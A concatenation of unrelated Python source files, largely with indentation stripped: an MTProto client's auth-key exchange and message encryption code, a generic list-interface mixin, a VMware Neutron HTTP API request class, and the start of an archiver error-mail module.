encrypted_data = crypt.ige_encrypt(data_with_sha_padded, self.tmp_aes_key, self.tmp_aes_iv)
g_a = self.server_DH_inner_data.g_a.to_int(byteorder='big')
dh_prime = self.server_DH_inner_data.dh_prime.to_int(byteorder='big')
b = self.b
new_nonce = self.p_q_inner_data.new_nonce.to_bytes()
for i in range(1, self.AUTH_MAX_RETRY): # retry when dh_gen_retry or dh_gen_fail
set_client_DH_params = tl.set_client_DH_params(
nonce=self.resPQ.nonce,
server_nonce=self.resPQ.server_nonce,
encrypted_data=tl.bytes_c(encrypted_data)
)
self.send_plaintext_message(set_client_DH_params.to_bytes())
self.set_client_DH_params_answer = tl.Set_client_DH_params_answer.from_stream(BytesIO(self.recv_plaintext_message()))
set_client_DH_params_answer = self.set_client_DH_params_answer
# print set_client_DH_params_answer
auth_key = pow(g_a, b, dh_prime)
auth_key_str = long_to_bytes(auth_key)
auth_key_sha = SHA1(auth_key_str)
auth_key_aux_hash = auth_key_sha[:8]
new_nonce_hash1 = SHA1(new_nonce+b'\x01'+auth_key_aux_hash)[-16:]
new_nonce_hash2 = SHA1(new_nonce+b'\x02'+auth_key_aux_hash)[-16:]
new_nonce_hash3 = SHA1(new_nonce+b'\x03'+auth_key_aux_hash)[-16:]
assert set_client_DH_params_answer.nonce == self.resPQ.nonce
assert set_client_DH_params_answer.server_nonce == self.resPQ.server_nonce
if set_client_DH_params_answer.number == tl.dh_gen_ok_c.number:
print(set_client_DH_params_answer.new_nonce_hash1, new_nonce_hash1)
assert set_client_DH_params_answer.new_nonce_hash1.to_bytes() == new_nonce_hash1
print("Diffie Hellman key exchange processed successfully")
self.server_salt = strxor(new_nonce[0:8], self.resPQ.server_nonce.to_bytes()[0:8])
self.auth_key.set_key(auth_key_str)
print("Auth key generated")
return "Auth Ok"
elif set_client_DH_params_answer.number == tl.dh_gen_retry_c.number:
assert set_client_DH_params_answer.new_nonce_hash2.to_bytes() == new_nonce_hash2
print("Retry Auth")
            elif set_client_DH_params_answer.number == tl.dh_gen_fail_c.number:
assert set_client_DH_params_answer.new_nonce_hash3.to_bytes() == new_nonce_hash3
print("Auth Failed")
raise Exception("Auth Failed")
else:
raise Exception("Response Error")
def generate_message_id(self):
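        # MTProto message ids carry the unix time in their upper 32 bits
        # (roughly unixtime * 2**32); client-generated ids must additionally
        # be divisible by 4, which is what the rounding loop below enforces.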
msg_id = int(time() * 2**32)
if self.last_message_id > msg_id:
msg_id = self.last_message_id + 1
        while msg_id % 4 != 0:
msg_id += 1
return msg_id
def send_plaintext_message(self, message_data): # package message, not chat message
msg = MTProtoUnencryptedMessage.new(self.generate_message_id(), message_data)
self.send_tcp_message(msg)
def recv_plaintext_message(self):
tcp_msg = self.recv_tcp_message()
msg = MTProtoUnencryptedMessage.from_bytes(tcp_msg.payload)
if msg.is_encrypted():
raise ValueError('did not get a plaintext message')
return msg.message_data
def send_encrypted_message(self, message_data):
"""
        Encrypted Message:
            auth_key_id:int64 | msg_key:int128 | encrypted_data:bytes
        encrypted_data:
salt:int64 | session_id:int64 | message_id:int64 | seq_no:int32 |
message_data_length:int32 | message_data:bytes | padding 0..15:bytes
"""
if self.session_id is None:
self.session_id = self.random.getrandbits(64).to_bytes(8, 'little')
msg = MTProtoEncryptedMessage.new(
int.from_bytes(self.server_salt, 'little'),
int.from_bytes(self.session_id, 'little'),
self.generate_message_id(),
1,
message_data)
msg = msg.encrypt(self.auth_key)
self.send_tcp_message(msg)
def recv_encrypted_message(self):
tcp_msg = self.recv_tcp_message()
msg = MTProtoEncryptedMessage.from_bytes(tcp_msg.payload)
msg = msg.decrypt(self.auth_key)
print('message_data:', to_hex(msg.encrypted_data.message_data))
"""
at this point, message_data looks a lot like this:
message_data:
Msg container -> DCF8F173
Vector<%Message>
num_items:int -> 02000000
%Message:
message_id:long -> 01D40F39 3BBFA055
seq_no:int -> 01000000
bytes:int -> 1C000000
body:Object ->
new_session_created -> 0809C29E
first_msg_id:long -> 00C8A02B 3BBFA055
unique_id:long -> 1A1D5711 00A96EC3
server_salt:long -> 74EEA560 D1AB64E3
%Message:
message_id -> 01541139 3BBFA055
seq_no:int -> 02000000
bytes:int -> 14000000
body:Object ->
msg_acks -> 59B4D662
Vector<long> -> 15C4B51C
count -> 01000000
long -> 00C8A02B 3BBFA055
"""
def send_tcp_message(self, mproto_message):
tcp_msg = MTProtoTCPMessage.new(self.number, mproto_message)
tcp_msg_data = tcp_msg.to_bytes()
print(to_hex(tcp_msg_data))
self.socket.write(tcp_msg_data)
self.number += 1
def recv_tcp_message(self):
tcp_msg = MTProtoTCPMessage.from_stream(self.socket)
if not tcp_msg.crc_ok():
raise ValueError('mproto_message checksum for tcp does not match')
return tcp_msg
def __del__(self):
# cleanup
self._socket.close()
class MTProtoMessage:
@classmethod
def from_tcp_msg(cls, tcp_msg):
if cls is MTProtoMessage:
if tcp_msg.payload[0:8] == b'\x00\x00\x00\x00\x00\x00\x00\x00':
return MTProtoUnencryptedMessage(tcp_msg.payload)
else:
return MTProtoEncryptedMessage(tcp_msg.payload)
else:
return cls(tcp_msg)
def is_encrypted(self):
return self.auth_key_id != 0
class MTProtoEncryptedMessage(namedtuple('MTProtoEncryptedMessage',
'auth_key_id msg_key encrypted_data'), MTProtoMessage):
"""
Ecrypted Message:
auth_key_id:int64 | msg_key:int128 | encrypted_data:bytes
Encrypted Message: encrypted_data
salt:int64 | session_id:int64 | message_id:int64 | seq_no:int32 | message_data_length:int32 | message_data:bytes | padding 0..15:bytes
"""
class EncryptedData(namedtuple('EncrypedData', 'salt session_id message_id seq_no message_data_length message_data')):
_header_struct = Struct('<QQQII')
@classmethod
def new(cls, salt, session_id, message_id, seq_no, message_data):
return cls(salt, session_id, message_id, seq_no, len(message_data), message_data)
def generate_padding(self):
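            # Pad the 32-byte header plus message_data up to a multiple of 16,
            # e.g. 20 bytes of message_data needs (16 - 52 % 16) % 16 == 12
            # bytes of random padding.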
return os.urandom((16 - (32 + len(self.message_data)) % 16) % 16)
def to_bytes(self):
return self._header_struct.pack(self.salt, self.session_id, self.message_id, self.seq_no, self.message_data_length) + self.message_data
@classmethod
def from_bytes(cls, data):
parts = list(cls._header_struct.unpack(data[0:32]))
message_data_length = parts[-1]
parts.append(data[32:32+message_data_length])
return cls(*parts)
@classmethod
def new(cls, salt, session_id, message_id, seq_no, message_data):
encrypted_data = cls.EncryptedData.new(salt, session_id, message_id, seq_no, message_data)
return cls(None, None, encrypted_data)
def encrypt(self, auth_key):
        unencrypted_data = self.encrypted_data.to_bytes()
        msg_key = SHA1(unencrypted_data)[-16:]
        unencrypted_data += self.encrypted_data.generate_padding()
        assert len(unencrypted_data) % 16 == 0
        encrypted_data = aes_encrypt(unencrypted_data, auth_key, msg_key)
return MTProtoEncryptedMessage(auth_key.key_id, msg_key, encrypted_data)
def decrypt(self, auth_key):
decrypted_data = aes_decrypt(self.encrypted_data, auth_key, self.msg_key)
return self._replace(encrypted_data=MTProtoEncryptedMessage.EncryptedData.from_bytes(decrypted_data))
@classmethod
def from_bytes(cls, data):
return cls(data[0:8], data[8:24], data[24:])
def to_bytes(self):
return b''.join((self.auth_key_id, self.msg_key, self.encrypted_data,))
class MTProtoTCPMessage(namedtuple('MTProtoTCPMessage', 'data')):
@classmethod
def new(cls, seq_no, mtproto_msg):
payload = mtproto_msg.to_bytes()
header_and_payload = bytes().join([
int.to_bytes(len(payload) + 12, 4, 'little'),
int.to_bytes(seq_no, 4, 'little'),
payload
])
crc = tl.int_c._to_bytes(crc32(header_and_payload))
return cls(header_and_payload + crc)
@classmethod
def from_stream(cls, stream):
length_bytes = stream.read(4)
length = int.from_bytes(length_bytes, 'little')
return cls(length_bytes + stream.read(length))
@property
def length(self):
return int.from_bytes(self.data[0:4], 'little')
@property
def seq_no(self):
return int.from_bytes(self.data[4:8], 'little')
@property
def payload(self):
return self.data[8:-4]
@property
def crc(self):
return int.from_bytes(self.data[-4:], 'little')
def crc_ok(self):
return self.crc == crc32(self.data[:-4])
def to_bytes(self):
return self.data
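# For reference, the frame produced by MTProtoTCPMessage.new() is
#   length(4, little-endian) | seq_no(4) | payload | crc32(4)
# where length counts the whole packet (hence the +12) and the CRC covers
# everything before it, matching crc_ok() above.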
# class MTProtoClient:
# def __init__(self, config, session_id=None):
# self.api_id = config.get('app', 'api_id')
# self.api_hash = config.get('app', 'api_hash')
# self.app_title = config.get('app', 'app_title')
# self.short_name = config.get('app', 'short_name')
# self.public_keys = config.get('servers', 'public_keys')
# self.test_dc = dc.DataCenter(config.get('servers', 'test_dc'))
# self.productinon_dc = dc.DataCenter(config.get('servers', 'production_dc'))
# # if self.use_test_dc:
# self.datacenter = self.test_dc
# # else:
# # self.datacenter = self.productinon_dc
# # self.datacenter = dc.DataCenter('tcp://127.0.0.1:8888')
# if session_id is None:
# self.session = MTProtoSession.new()
# print('creating new session: {}'.format(self.session))
# else:
# self.session = MTProtoSession(session_id)
# print('continuing session: {}'.format(self.session))
# @asyncio.coroutine
# def run(self, loop):
# while True:
# # self.get_nearest_dc()
# yield from asyncio.sleep(1)
# def compare(self):
# MTProto('FFFFFFFFF', 'EEEEEEEE', self.public_keys)
# def init(self, loop):
# # MTProto('FFFFFFFFF', 'EEEEEEEE', self.public_keys)
# asyncio.async(self.run(loop))
# self.datacenter.init(loop)
# # def add_to_run_loop(self, loop):
# # from . connection import MTProtoConnection
# # self.conn = MTProtoConnection('TCP')
# # coro = loop.create_connection(lambda: self.conn, '127.0.0.1', 8888)
# # loop.run_until_complete(coro)
# # loop.run_until_complete(self.run())
# class MTProtoClientProtocol(asyncio.Protocol):
# _header_struct = Struct('<QI')
# last_message_id = 0
# def __init__(self, server_info):
# self._ingress = asyncio.Queue()
# self._egress = asyncio.Queue()
# self._mtproto_transport = None
# @asyncio.coroutine
# def get_ingress(self):
# result = yield from self._ingress.get()
# return result
# @asyncio.coroutine
# def send_insecure_message(self, msg_data):
# message_id = generate_message_id(self.last_message_id)
# mtproto_msg = memoryview(bytearray(self._header_struct.size + len(msg_data)))
# self._header_struct.pack_into(mtproto_msg, 8, message_id, len(msg_data))
# mtproto_msg[-len(msg_data):] = msg_data
# self.last_message_id = message_id
# self.transport.write(mtproto_msg)
# @asyncio.coroutine
# def send_encrypted_message(self, msg):
# yield from self._egress.put(msg)
# def create_connection(self, *args, **kwargs):
# raise NotImplementedError()
# def generate_message_id(last_message_id):
# from time import time
# msg_id = int(time() * 2**32)
# if last_message_id > msg_id:
# msg_id = last_message_id + 1
# while msg_id % 4 is not 0:
# msg_id += 1
# return msg_id
class MTProtoUnencryptedMessage(
namedtuple('MTProtoUnencryptedMessage', 'message_id message')):
"""
Unencrypted Message:
auth_key_id = 0:int64 message_id:int64 message_data_length:int32 message_data:bytes
"""
_header_struct = Struct('<QQI')
def __new__(cls, message_id, message):
return super().__new__(cls, scheme.int64_c(message_id), message)
# message_data = msg.get_bytes()
# return super().__new__(cls,
# auth_key_id=scheme.int64_c(0),
# message_id=scheme.int64_c(message_id),
# message_data_length=scheme.int32_c(len(message_data)),
# message_data=message_data)
auth_key_id = scheme.int64_c(0).get_bytes()
@classmethod
def from_bytes(cls, data):
auth_key_id, message_id, message_data_length = cls._header_struct.unpack(data[0:20])
return super().__new__(cls, auth_key_id, message_id, message_data_length, data[20:])
def get_bytes(self):
message_data = self.message.get_bytes()
message_data_length = scheme.int32_c(len(message_data)).get_bytes()
message_id = self.message_id.get_bytes()
mtproto_msg = bytes().join((self.auth_key_id, message_id, message_data_length, message_data),)
return mtproto_msg
class MTProtoClient:
def __init__(self, session_data=None):
self._transport = None
self._ingress = asyncio.Queue()
self._egress = asyncio.Queue()
self.last_message_id = 0
@asyncio.coroutine
def _handle_egress(self):
done = False
while not done:
msg = yield from self._egress.get()
log.debug('_handle_egress: {}'.format(msg))
while self._transport is None:
yield from asyncio.sleep(.1)
yield from self._transport.send(msg.get_bytes())
@asyncio.coroutine
def _handle_ingress(self):
done = False
while not done:
msg = yield from self._ingress.get()
self.transport.send(msg.get_bytes())
yield from asyncio.sleep(1)
@asyncio.coroutine
def _handle_connection(self, loop):
if self._transport is None:
log.debug('no transport, creating one now')
self._transport = MTProtoTransport('TCP')
coro = loop.create_connection(lambda: self._transport, '149.154.167.40', 443)
asyncio.async(coro)
done = False
while not done:
yield from asyncio.sleep(1)
def generate_message_id(self):
msg_id = int(time() * 2**32)
if self.last_message_id > msg_id:
msg_id = self.last_message_id + 1
        while msg_id % 4 != 0:
msg_id += 1
return msg_id
@asyncio.coroutine
def send_unencrypted_message(self, msg_obj):
unencrypted_message = MTProtoUnencryptedMessage(self.generate_message_id(), msg_obj)
yield from self._egress.put(unencrypted_message)
def send_encrypted_message(self, msg_obj):
raise NotImplementedError()
@asyncio.coroutine
def async_run(self, loop):
self._transport = MTProtoTransport('TCP')
done = False
while not done:
yield from asyncio.sleep(1)
@asyncio.coroutine
def create_authorization_key(self):
yield from self.send_unencrypted_message(scheme.req_pq(nonce=SystemRandom().getrandbits(128)))
def run(self):
loop = asyncio.get_event_loop()
self._transport = MTProtoTransport('TCP')
try:
            loop.run_in_executor(None, self._transport.run)
asyncio.async(self._handle_egress())
asyncio.async(self._handle_ingress())
# asyncio.async(self._handle_connection(loop))
# asyncio.async(self.async_run(loop))
# asyncio.async(self.create_authorization_key())
loop.run_forever()
except KeyboardInterrupt:
print('exiting due to KeyboardInterrupt')
finally:
loop.close()
def main():
client = MTProtoClient()
client.run()
# dc = DataCenter('tcp://149.154.167.40:443')
# loop = asyncio.get_event_loop()
# asyncio.async(dc.async_run(loop), loop=loop)
# loop.run_forever()
# loop.close()
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2008-2009 Aryeh Leib Taurog, all rights reserved.
# Released under the New BSD license.
"""
This module contains a base type which provides list-style mutations
without specific data storage methods.
See also http://static.aryehleib.com/oldsite/MutableLists.html
Author: Aryeh Leib Taurog.
"""
from functools import total_ordering
@total_ordering
class ListMixin:
"""
A base class which provides complete list interface.
Derived classes must call ListMixin's __init__() function
and implement the following:
function _get_single_external(self, i):
Return single item with index i for general use.
The index i will always satisfy 0 <= i < len(self).
function _get_single_internal(self, i):
Same as above, but for use within the class [Optional]
    Note that if _get_single_external and _get_single_internal return
different types of objects, _set_list must distinguish
between the two and handle each appropriately.
function _set_list(self, length, items):
Recreate the entire object.
NOTE: items may be a generator which calls _get_single_internal.
Therefore, it is necessary to cache the values in a temporary:
temp = list(items)
before clobbering the original storage.
function _set_single(self, i, value):
Set the single item at index i to value [Optional]
If left undefined, all mutations will result in rebuilding
the object using _set_list.
function __len__(self):
Return the length
int _minlength:
The minimum legal length [Optional]
int _maxlength:
The maximum legal length [Optional]
type or tuple _allowed:
A type or tuple of allowed item types [Optional]
"""
_minlength = 0
_maxlength = None
# ### Python initialization and special list interface methods ###
def __init__(self, *args, **kwargs):
if not hasattr(self, '_get_single_internal'):
self._get_single_internal = self._get_single_external
if not hasattr(self, '_set_single'):
self._set_single = self._set_single_rebuild
self._assign_extended_slice = self._assign_extended_slice_rebuild
super().__init__(*args, **kwargs)
def __getitem__(self, index):
"Get the item(s) at the specified index/slice."
if isinstance(index, slice):
return [self._get_single_external(i) for i in range(*index.indices(len(self)))]
else:
index = self._checkindex(index)
return self._get_single_external(index)
def __delitem__(self, index):
"Delete the item(s) at the specified index/slice."
if not isinstance(index, (int, slice)):
raise TypeError("%s is not a legal index" % index)
# calculate new length and dimensions
origLen = len(self)
if isinstance(index, int):
index = self._checkindex(index)
indexRange = [index]
else:
indexRange = range(*index.indices(origLen))
newLen = origLen - len(indexRange)
newItems = (self._get_single_internal(i)
for i in range(origLen)
if i not in indexRange)
self._rebuild(newLen, newItems)
def __setitem__(self, index, val):
"Set the item(s) at the specified index/slice."
if isinstance(index, slice):
self._set_slice(index, val)
else:
index = self._checkindex(index)
self._check_allowed((val,))
self._set_single(index, val)
# ### Special methods for arithmetic operations ###
def __add__(self, other):
'add another list-like object'
return self.__class__(list(self) + list(other))
def __radd__(self, other):
'add to another list-like object'
return other.__class__(list(other) + list(self))
def __iadd__(self, other):
'add another list-like object to self'
self.extend(list(other))
return self
def __mul__(self, n):
'multiply'
return self.__class__(list(self) * n)
def __rmul__(self, n):
'multiply'
return self.__class__(list(self) * n)
def __imul__(self, n):
'multiply'
if n <= 0:
del self[:]
else:
cache = list(self)
for i in range(n - 1):
self.extend(cache)
return self
def __eq__(self, other):
olen = len(other)
for i in range(olen):
try:
c = self[i] == other[i]
except IndexError:
# self must be shorter
return False
if not c:
return False
return len(self) == olen
def __lt__(self, other):
olen = len(other)
for i in range(olen):
try:
c = self[i] < other[i]
except IndexError:
# self must be shorter
return True
if c:
return c
elif other[i] < self[i]:
return False
return len(self) < olen
# ### Public list interface Methods ###
# ## Non-mutating ##
def count(self, val):
"Standard list count method"
count = 0
for i in self:
if val == i:
count += 1
return count
def index(self, val):
"Standard list index method"
for i in range(0, len(self)):
if self[i] == val:
return i
raise ValueError('%s not found in object' % val)
# ## Mutating ##
def append(self, val):
"Standard list append method"
self[len(self):] = [val]
def extend(self, vals):
"Standard list extend method"
self[len(self):] = vals
def insert(self, index, val):
"Standard list insert method"
if not isinstance(index, int):
raise TypeError("%s is not a legal index" % index)
self[index:index] = [val]
def pop(self, index=-1):
"Standard list pop method"
result = self[index]
del self[index]
return result
def remove(self, val):
"Standard list remove method"
del self[self.index(val)]
def reverse(self):
"Standard list reverse method"
self[:] = self[-1::-1]
def sort(self, cmp=None, key=None, reverse=False):
"Standard list sort method"
if key:
temp = [(key(v), v) for v in self]
temp.sort(key=lambda x: x[0], reverse=reverse)
self[:] = [v[1] for v in temp]
else:
temp = list(self)
if cmp is not None:
temp.sort(cmp=cmp, reverse=reverse)
else:
temp.sort(reverse=reverse)
self[:] = temp
# ### Private routines ###
def _rebuild(self, newLen, newItems):
if newLen and newLen < self._minlength:
raise ValueError('Must have at least %d items' % self._minlength)
if self._maxlength is not None and newLen > self._maxlength:
raise ValueError('Cannot have more than %d items' % self._maxlength)
self._set_list(newLen, newItems)
def _set_single_rebuild(self, index, value):
self._set_slice(slice(index, index + 1, 1), [value])
def _checkindex(self, index, correct=True):
length = len(self)
if 0 <= index < length:
return index
if correct and -length <= index < 0:
return index + length
raise IndexError('invalid index: %s' % index)
def _check_allowed(self, items):
if hasattr(self, '_allowed'):
if False in [isinstance(val, self._allowed) for val in items]:
raise TypeError('Invalid type encountered in the arguments.')
def _set_slice(self, index, values):
"Assign values to a slice of the object"
try:
iter(values)
except TypeError:
raise TypeError('can only assign an iterable to a slice')
self._check_allowed(values)
origLen = len(self)
valueList = list(values)
start, stop, step = index.indices(origLen)
# CAREFUL: index.step and step are not the same!
# step will never be None
if index.step is None:
self._assign_simple_slice(start, stop, valueList)
else:
self._assign_extended_slice(start, stop, step, valueList)
def _assign_extended_slice_rebuild(self, start, stop, step, valueList):
'Assign an extended slice by rebuilding entire list'
indexList = range(start, stop, step)
# extended slice, only allow assigning slice of same size
if len(valueList) != len(indexList):
raise ValueError('attempt to assign sequence of size %d '
'to extended slice of size %d'
% (len(valueList), len(indexList)))
# we're not changing the length of the sequence
newLen = len(self)
newVals = dict(zip(indexList, valueList))
def newItems():
for i in range(newLen):
if i in newVals:
yield newVals[i]
else:
yield self._get_single_internal(i)
self._rebuild(newLen, newItems())
def _assign_extended_slice(self, start, stop, step, valueList):
'Assign an extended slice by re-assigning individual items'
indexList = range(start, stop, step)
# extended slice, only allow assigning slice of same size
if len(valueList) != len(indexList):
raise ValueError('attempt to assign sequence of size %d '
'to extended slice of size %d'
% (len(valueList), len(indexList)))
for i, val in zip(indexList, valueList):
self._set_single(i, val)
def _assign_simple_slice(self, start, stop, valueList):
'Assign a simple slice; Can assign slice of any length'
origLen = len(self)
stop = max(start, stop)
newLen = origLen - stop + start + len(valueList)
def newItems():
for i in range(origLen + 1):
if i == start:
for val in valueList:
yield val
if i < origLen:
if i < start or i >= stop:
yield self._get_single_internal(i)
self._rebuild(newLen, newItems())
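# A minimal usage sketch (not part of the original module): a tuple-backed
# list type implementing only the hooks documented in the ListMixin docstring.
class ExampleTupleList(ListMixin):
    _allowed = int
    def __init__(self, items=()):
        self._data = tuple(items)
        super().__init__()
    def __len__(self):
        return len(self._data)
    def _get_single_external(self, index):
        return self._data[index]
    def _set_list(self, length, items):
        # items may be a generator over _get_single_internal, so realize it
        # before replacing the storage (see the docstring above).
        self._data = tuple(items)
if __name__ == '__main__':
    example = ExampleTupleList([1, 2, 3])
    example.append(4)
    example[0:2] = [9, 8]
    assert list(example) == [9, 8, 3, 4]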
|
|
# Copyright 2012 VMware, Inc.
#
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import abc
import copy
import httplib
import time
import eventlet
from oslo_utils import excutils
import six
import six.moves.urllib.parse as urlparse
from neutron.i18n import _LI, _LW
from neutron.openstack.common import log as logging
from neutron.plugins.vmware import api_client
LOG = logging.getLogger(__name__)
DEFAULT_HTTP_TIMEOUT = 30
DEFAULT_RETRIES = 2
DEFAULT_REDIRECTS = 2
DEFAULT_API_REQUEST_POOL_SIZE = 1000
DEFAULT_MAXIMUM_REQUEST_ID = 4294967295
DOWNLOAD_TIMEOUT = 180
@six.add_metaclass(abc.ABCMeta)
class ApiRequest(object):
'''An abstract baseclass for all ApiRequest implementations.
This defines the interface and property structure for both eventlet and
gevent-based ApiRequest classes.
'''
# List of allowed status codes.
ALLOWED_STATUS_CODES = [
httplib.OK,
httplib.CREATED,
httplib.NO_CONTENT,
httplib.MOVED_PERMANENTLY,
httplib.TEMPORARY_REDIRECT,
httplib.BAD_REQUEST,
httplib.UNAUTHORIZED,
httplib.FORBIDDEN,
httplib.NOT_FOUND,
httplib.CONFLICT,
httplib.INTERNAL_SERVER_ERROR,
httplib.SERVICE_UNAVAILABLE
]
@abc.abstractmethod
def start(self):
pass
@abc.abstractmethod
def join(self):
pass
@abc.abstractmethod
def copy(self):
pass
def _issue_request(self):
'''Issue a request to a provider.'''
conn = (self._client_conn or
self._api_client.acquire_connection(True,
copy.copy(self._headers),
rid=self._rid()))
if conn is None:
error = Exception(_("No API connections available"))
self._request_error = error
return error
url = self._url
LOG.debug("[%(rid)d] Issuing - request url: %(conn)s "
"body: %(body)s",
{'rid': self._rid(), 'conn': self._request_str(conn, url),
'body': self._body})
issued_time = time.time()
is_conn_error = False
is_conn_service_unavail = False
response = None
try:
redirects = 0
while (redirects <= self._redirects):
# Update connection with user specified request timeout,
# the connect timeout is usually smaller so we only set
# the request timeout after a connection is established
if conn.sock is None:
conn.connect()
conn.sock.settimeout(self._http_timeout)
elif conn.sock.gettimeout() != self._http_timeout:
conn.sock.settimeout(self._http_timeout)
headers = copy.copy(self._headers)
cookie = self._api_client.auth_cookie(conn)
if cookie:
headers["Cookie"] = cookie
gen = self._api_client.config_gen
if gen:
headers["X-Nvp-Wait-For-Config-Generation"] = gen
LOG.debug("Setting X-Nvp-Wait-For-Config-Generation "
"request header: '%s'", gen)
try:
conn.request(self._method, url, self._body, headers)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.warn(_LW("[%(rid)d] Exception issuing request: "
"%(e)s"),
{'rid': self._rid(), 'e': e})
response = conn.getresponse()
response.body = response.read()
response.headers = response.getheaders()
elapsed_time = time.time() - issued_time
LOG.debug("[%(rid)d] Completed request '%(conn)s': "
"%(status)s (%(elapsed)s seconds)",
{'rid': self._rid(),
'conn': self._request_str(conn, url),
'status': response.status,
'elapsed': elapsed_time})
new_gen = response.getheader('X-Nvp-Config-Generation', None)
if new_gen:
LOG.debug("Reading X-Nvp-config-Generation response "
"header: '%s'", new_gen)
if (self._api_client.config_gen is None or
self._api_client.config_gen < int(new_gen)):
self._api_client.config_gen = int(new_gen)
if response.status == httplib.UNAUTHORIZED:
if cookie is None and self._url != "/ws.v1/login":
# The connection still has no valid cookie despite
# attempts to authenticate and the request has failed
# with unauthorized status code. If this isn't a
# a request to authenticate, we should abort the
# request since there is no point in retrying.
self._abort = True
# If request is unauthorized, clear the session cookie
# for the current provider so that subsequent requests
# to the same provider triggers re-authentication.
self._api_client.set_auth_cookie(conn, None)
elif response.status == httplib.SERVICE_UNAVAILABLE:
is_conn_service_unavail = True
if response.status not in [httplib.MOVED_PERMANENTLY,
httplib.TEMPORARY_REDIRECT]:
break
elif redirects >= self._redirects:
LOG.info(_LI("[%d] Maximum redirects exceeded, aborting "
"request"), self._rid())
break
redirects += 1
conn, url = self._redirect_params(conn, response.headers,
self._client_conn is None)
if url is None:
response.status = httplib.INTERNAL_SERVER_ERROR
break
LOG.info(_LI("[%(rid)d] Redirecting request to: %(conn)s"),
{'rid': self._rid(),
'conn': self._request_str(conn, url)})
# yield here, just in case we are not out of the loop yet
eventlet.greenthread.sleep(0)
# If we receive any of these responses, then
# our server did not process our request and may be in an
# errored state. Raise an exception, which will cause the
# the conn to be released with is_conn_error == True
# which puts the conn on the back of the client's priority
# queue.
            if (response.status >= httplib.INTERNAL_SERVER_ERROR and
                    response.status != httplib.NOT_IMPLEMENTED):
LOG.warn(_LW("[%(rid)d] Request '%(method)s %(url)s' "
"received: %(status)s"),
{'rid': self._rid(), 'method': self._method,
'url': self._url, 'status': response.status})
                raise Exception(_('Server error return: %s') % response.status)
return response
except Exception as e:
if isinstance(e, httplib.BadStatusLine):
msg = (_("Invalid server response"))
else:
msg = unicode(e)
if response is None:
elapsed_time = time.time() - issued_time
LOG.warn(_LW("[%(rid)d] Failed request '%(conn)s': '%(msg)s' "
"(%(elapsed)s seconds)"),
{'rid': self._rid(), 'conn': self._request_str(conn, url),
'msg': msg, 'elapsed': elapsed_time})
self._request_error = e
is_conn_error = True
return e
finally:
# Make sure we release the original connection provided by the
# acquire_connection() call above.
if self._client_conn is None:
self._api_client.release_connection(conn, is_conn_error,
is_conn_service_unavail,
rid=self._rid())
def _redirect_params(self, conn, headers, allow_release_conn=False):
"""Process redirect response, create new connection if necessary.
Args:
conn: connection that returned the redirect response
headers: response headers of the redirect response
allow_release_conn: if redirecting to a different server,
release existing connection back to connection pool.
Returns: Return tuple(conn, url) where conn is a connection object
to the redirect target and url is the path of the API request
"""
url = None
for name, value in headers:
if name.lower() == "location":
url = value
break
if not url:
LOG.warn(_LW("[%d] Received redirect status without location "
"header field"), self._rid())
return (conn, None)
# Accept location with the following format:
# 1. /path, redirect to same node
# 2. scheme://hostname:[port]/path where scheme is https or http
# Reject others
# 3. e.g. relative paths, unsupported scheme, unspecified host
result = urlparse.urlparse(url)
if not result.scheme and not result.hostname and result.path:
if result.path[0] == "/":
if result.query:
url = "%s?%s" % (result.path, result.query)
else:
url = result.path
return (conn, url) # case 1
else:
LOG.warn(_LW("[%(rid)d] Received invalid redirect location: "
"'%(url)s'"), {'rid': self._rid(), 'url': url})
return (conn, None) # case 3
elif result.scheme not in ["http", "https"] or not result.hostname:
LOG.warn(_LW("[%(rid)d] Received malformed redirect "
"location: %(url)s"),
{'rid': self._rid(), 'url': url})
return (conn, None) # case 3
# case 2, redirect location includes a scheme
# so setup a new connection and authenticate
if allow_release_conn:
self._api_client.release_connection(conn)
conn_params = (result.hostname, result.port, result.scheme == "https")
conn = self._api_client.acquire_redirect_connection(conn_params, True,
self._headers)
if result.query:
url = "%s?%s" % (result.path, result.query)
else:
url = result.path
return (conn, url)
def _rid(self):
'''Return current request id.'''
return self._request_id
@property
def request_error(self):
'''Return any errors associated with this instance.'''
return self._request_error
def _request_str(self, conn, url):
'''Return string representation of connection.'''
return "%s %s/%s" % (self._method, api_client.ctrl_conn_to_str(conn),
url)
|
|
import functools
from framework.auth import Auth
from website.archiver import (
StatResult, AggregateStatResult,
ARCHIVER_NETWORK_ERROR,
ARCHIVER_SIZE_EXCEEDED,
ARCHIVER_FILE_NOT_FOUND,
ARCHIVER_FORCED_FAILURE,
)
from website import (
mails,
settings
)
from osf.utils.sanitize import unescape_entities
def send_archiver_size_exceeded_mails(src, user, stat_result, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_SIZE_EXCEEDED_DESK,
user=user,
src=src,
stat_result=stat_result,
can_change_preferences=False,
url=url,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_SIZE_EXCEEDED_USER,
user=user,
src=src,
can_change_preferences=False,
)
def send_archiver_copy_error_mails(src, user, results, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_COPY_ERROR_DESK,
user=user,
src=src,
results=results,
url=url,
can_change_preferences=False,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_COPY_ERROR_USER,
user=user,
src=src,
results=results,
can_change_preferences=False,
)
def send_archiver_file_not_found_mails(src, user, results, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_FILE_NOT_FOUND_DESK,
can_change_preferences=False,
user=user,
src=src,
results=results,
url=url,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_FILE_NOT_FOUND_USER,
user=user,
src=src,
results=results,
can_change_preferences=False,
)
def send_archiver_uncaught_error_mails(src, user, results, url):
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.ARCHIVE_UNCAUGHT_ERROR_DESK,
user=user,
src=src,
results=results,
can_change_preferences=False,
url=url,
)
mails.send_mail(
to_addr=user.username,
mail=mails.ARCHIVE_UNCAUGHT_ERROR_USER,
user=user,
src=src,
